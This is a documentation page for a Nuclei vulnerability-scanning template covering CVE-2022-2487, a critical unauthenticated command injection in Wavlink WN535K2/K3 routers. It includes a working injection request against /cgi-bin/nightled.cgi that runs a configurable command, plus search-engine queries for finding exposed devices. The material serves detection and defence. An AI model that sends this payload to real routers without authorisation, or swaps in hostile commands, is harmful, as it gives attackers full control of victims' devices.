Skip to content
Nuclei Templates

Wavlink WN535K2/WN535K3 - OS Command Injection

ID: CVE-2022-2487

Severity: critical

Author: For3stCo1d

Tags: cve,cve2022,iot,wavlink,router,rce,oast

Description

Section titled “Description”

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: CVE-2022-2487


info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
    - https://vuldb.com/?id.204538
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2487
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2487
    cwe-id: CWE-78
    epss-score: 0.97404
    epss-percentile: 0.99916
    cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn535k2_firmware
    shodan-query:
      - http.title:"Wi-Fi APP Login"
      - http.title:"wi-fi app login"
    fofa-query: title="wi-fi app login"
    google-query: intitle:"wi-fi app login"
  tags: cve,cve2022,iot,wavlink,router,rce,oast
variables:
  cmd: "id"


http:
  - raw:
      - |
        @timeout: 10s
        POST /cgi-bin/nightled.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        page=night_led&start_hour=;{{cmd}};


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "nightStart"
        condition: and


      - type: word
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a0047304502207fe4c6ceb0983dc704965292145bea1c6e17b3710dc03e3c1ea5981c5df373e0022100b2e0be5df388eb506ffc73eb1da4d719175f9620f400f022b6a3c8c993023dee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2487.yaml"

View on Github